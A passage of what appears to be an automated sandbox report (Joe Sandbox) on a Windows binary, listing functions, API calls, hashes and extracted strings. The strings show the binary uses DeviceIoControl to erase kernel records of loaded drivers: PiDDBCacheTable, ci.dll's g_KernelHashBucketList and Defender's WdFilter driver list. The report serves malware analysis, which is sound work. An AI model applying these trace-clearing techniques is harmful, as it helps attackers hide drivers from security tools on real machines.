                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fseeki64fgetpos
                                                                                          • String ID:
                                                                                          • API String ID: 3401907645-0
                                                                                          • Opcode ID: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
                                                                                          • Instruction ID: 47f022c022e0604e10c9cf22a5ca7231126162a9929c9099c9d34004878a59e4
                                                                                          • Opcode Fuzzy Hash: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
                                                                                          • Instruction Fuzzy Hash: 53319132614B8181EB609F15E5443A8B7A1FB54FBCFA58131CE8C877A4DF38D592C310
                                                                                          Function 00007FF7CC418EC0 Relevance: 3.1, APIs: 2, Instructions: 63fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: fwritememmove
                                                                                          • String ID:
                                                                                          • API String ID: 1388854176-0
                                                                                          • Opcode ID: d0bc0cad5045deec8b08edcf7ecc2066f853a68d8101d3ed3ec60c7521b39cfd
                                                                                          • Instruction ID: 4c36f75da5fd0a09dc46fa26806b2b8b46642ade4519ad3fbfaa03a45ff46423
                                                                                          • Opcode Fuzzy Hash: d0bc0cad5045deec8b08edcf7ecc2066f853a68d8101d3ed3ec60c7521b39cfd
                                                                                          • Instruction Fuzzy Hash: A011B722B04B8185EA159F9A94517B8A760FB84FD8FAC4035EF4C47755CE3DD5528310
                                                                                          Function 00007FF7CC419EF0 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F50
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F72
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
                                                                                          • String ID:
                                                                                          • API String ID: 356833432-0
                                                                                          • Opcode ID: f0a3e077bed6b7d5e3db689f18c24d9aed0d68b6a22537dfba5207280866f1ca
                                                                                          • Instruction ID: 31a49e6b32eab21560742a0546543c63bed55695a9f75db3996a737d2810e7de
                                                                                          • Opcode Fuzzy Hash: f0a3e077bed6b7d5e3db689f18c24d9aed0d68b6a22537dfba5207280866f1ca
                                                                                          • Instruction Fuzzy Hash: DC118F32A08B81D1DB449F6AE65436D7BA4FB48F98F958035DB8D87B60CF38D46AC350
                                                                                          Function 00007FF7CC411E20 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC411EB6
                                                                                          • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC411EC4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_istream@??1?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 1470210177-0
                                                                                          • Opcode ID: a987b10daf80cc0ca51eefb8f321a5344bce280e03feb1e36749e0c1e7aed86a
                                                                                          • Instruction ID: fb1a4b93a011010e3d1f5c34685ee1f1a58575b532133d4d178e1bfa74373e51
                                                                                          • Opcode Fuzzy Hash: a987b10daf80cc0ca51eefb8f321a5344bce280e03feb1e36749e0c1e7aed86a
                                                                                          • Instruction Fuzzy Hash: E311E472605F8684DB449F29E5843A87BA5FB48F9CF94C032CA4D43365DF38D599C710
                                                                                          Function 00007FF7CC414000 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC414096
                                                                                          • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC4140A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ostream@??1?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 3334500376-0
                                                                                          • Opcode ID: e41750b549600594b78e506d084f51f477a90b595201979025fe288e4540104a
                                                                                          • Instruction ID: 5af2ec02ca81e6942588d5256e93481fec0cbcf812aeba1fe322d47e671f5afa
                                                                                          • Opcode Fuzzy Hash: e41750b549600594b78e506d084f51f477a90b595201979025fe288e4540104a
                                                                                          • Instruction Fuzzy Hash: 64111432B04F8694DB449F2AD5803A87BA5FB49BACF94D032CA8E43365DF39D599C710

                                                                                          Non-executed Functions

                                                                                          Function 00007FF7CC417EA0 Relevance: 89.9, APIs: 27, Strings: 24, Instructions: 664COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC4232F3
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423310
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualAlloc.KERNEL32 ref: 00007FF7CC423326
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC423341
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423362
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417F38
                                                                                            • Part of subcall function 00007FF7CC416D90: DeviceIoControl.KERNEL32 ref: 00007FF7CC416E35
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC418038
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7CC418044
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC418054
                                                                                            • Part of subcall function 00007FF7CC416E90: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F50
                                                                                            • Part of subcall function 00007FF7CC416E90: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F90
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41808F
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41810B
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41814E
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41817D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC418970
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$Virtual$??6?$basic_ostream@_?good@ios_base@std@@ControlDeviceFreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@AllocOsfx@?$basic_ostream@_V12@V21@@Vios_base@1@memmove
                                                                                          • String ID: 0$PAGE$[!] g_KernelHashBucketList looks empty!$[+] Found In g_KernelHashBucketList: $[+] g_HashCacheLock Locked$[+] g_KernelHashBucketList Cleaned$[+] g_KernelHashBucketList Found 0x$[-] Can't Find ci.dll module address$[-] Can't Find g_HashCache relative address$[-] Can't Find g_HashCacheLock$[-] Can't Find g_KernelHashBucketList$[-] Can't lock g_HashCacheLock$[-] Failed to clear g_KernelHashBucketList entry pool!$[-] Failed to read first g_KernelHashBucketList entry!$[-] Failed to read g_KernelHashBucketList entry text len!$[-] Failed to read g_KernelHashBucketList entry text ptr!$[-] Failed to read g_KernelHashBucketList entry text!$[-] Failed to read g_KernelHashBucketList next entry ptr!$[-] Failed to read g_KernelHashBucketList next entry!$[-] Failed to release g_KernelHashBucketList lock!$[-] Failed to write g_KernelHashBucketList prev entry ptr!$ci.dll$xxx$xxx????x?xxxxxxx
                                                                                          • API String ID: 3205709563-1878664939
                                                                                          • Opcode ID: fbdcc912be7e2ace4436527d300a58b5be014fba983da166f70093ee60b76d1d
                                                                                          • Instruction ID: 7f5c02f16008f18271ca8318f80fd9366c831faf940082ef11a57190d89ecde8
                                                                                          • Opcode Fuzzy Hash: fbdcc912be7e2ace4436527d300a58b5be014fba983da166f70093ee60b76d1d
                                                                                          • Instruction Fuzzy Hash: 1F627062F18B8285EB00EF61E4402EDABB1AB457ACFA09135DE9D57799DF3CD245C320
                                                                                          Function 00007FF7CC4172B0 Relevance: 79.2, APIs: 23, Strings: 22, Instructions: 467COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                            • Part of subcall function 00007FF7CC417C70: DeviceIoControl.KERNEL32 ref: 00007FF7CC417D33
                                                                                            • Part of subcall function 00007FF7CC417C70: memcmp.VCRUNTIME140 ref: 00007FF7CC417DB3
                                                                                            • Part of subcall function 00007FF7CC417C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417DF5
                                                                                            • Part of subcall function 00007FF7CC417B00: memset.VCRUNTIME140 ref: 00007FF7CC417B7F
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417C28
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4173DD
                                                                                            • Part of subcall function 00007FF7CC417C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417E8A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417400
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC417450
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7CC417460
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417470
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC417493
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7CC4174A3
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4174B3
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417520
                                                                                            • Part of subcall function 00007FF7CC4145E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC414291
                                                                                            • Part of subcall function 00007FF7CC4170E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417204
                                                                                            • Part of subcall function 00007FF7CC4170E0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417256
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4175CB
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41765B
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC417695
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC4176A1
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC4176B1
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC417A7A
                                                                                            • Part of subcall function 00007FF7CC416FC0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417080
                                                                                            • Part of subcall function 00007FF7CC416FC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4170C0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC417AC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@_$_invalid_parameter_noinfo_noreturn$ControlDeviceV21@@Vios_base@1@$?good@ios_base@std@@V01@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@memcmpmemset
                                                                                          • String ID: 0$PAGE$RtlDeleteElementGenericTableAvl$[!] Failed to find RtlDeleteElementGenericTableAvl$[+] Found Table Entry = 0x$[+] PiDDBCacheTable Cleaned$[+] PiDDBCacheTable Ptr 0x$[+] PiDDBLock Locked$[+] PiDDBLock Ptr 0x$[+] PiDDBLock found with second pattern$[-] Can't delete from PiDDBCacheTable$[-] Can't get next entry$[-] Can't get prev entry$[-] Can't lock PiDDBCacheTable$[-] Can't set next entry$[-] Can't set prev entry$[-] Not found in cache$[-] Warning PiDDBCacheTable not found$[-] Warning PiDDBLock not found$xxx????xxxxx????xxx????x????x$xxxxxx$xxxxxx????xxxxx????xxx????xxxxx????x????xx?x
                                                                                          • API String ID: 239703443-2336041386
                                                                                          • Opcode ID: 345a374fe4df50a38d8664dd4f23488d79b17e9aa302e9a2f460d2100936c4b7
                                                                                          • Instruction ID: 8776915621c5fea8ef57fa7dd8ebf10b19f234efa44f5d00cd76b3ce231486cd
                                                                                          • Opcode Fuzzy Hash: 345a374fe4df50a38d8664dd4f23488d79b17e9aa302e9a2f460d2100936c4b7
                                                                                          • Instruction Fuzzy Hash: 3C324C72E18B8295EB00EF61E8412A9BBA1BB487ACF948135DD4D53759DF3CE749C320
                                                                                          Function 00007FF7CC415010 Relevance: 60.1, APIs: 19, Strings: 15, Instructions: 570COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC4232F3
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423310
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualAlloc.KERNEL32 ref: 00007FF7CC423326
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC423341
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423362
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4150B2
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4150E0
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415145
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415269
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415304
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4153CB
                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC41541A
                                                                                            • Part of subcall function 00007FF7CC415E00: DeviceIoControl.KERNEL32 ref: 00007FF7CC415E9B
                                                                                          • wcsstr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC41544F
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC4154BA
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41554A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC4155A4
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415633
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4156D4
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415753
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4157DB
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415863
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4158EB
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC41592C
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC415970
                                                                                            • Part of subcall function 00007FF7CC41AA30: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA6F
                                                                                            • Part of subcall function 00007FF7CC41AA30: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$ControlDevice$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$Virtual$FreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$AllocHandleModulememmovememsetwcsstr
                                                                                          • String ID: 0$PAGE$WdFilter.sys$[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod$[!] Failed to find WdFilter MpFreeDriverInfoEx$[!] Failed to find WdFilter RuntimeDriversCount$[!] Failed to find WdFilter RuntimeDriversList$[!] Failed to remove from RuntimeDriversArray$[+] Found WdFilter MpFreeDriverInfoEx with second pattern$[+] WdFilter.sys not loaded, clear skipped$[+] WdFilterDriverList Cleaned: $xx????xxx$xxx????xx$xxx?x?xx???????????x$xxx?xx?x???????????x
                                                                                          • API String ID: 3544830047-4286004192
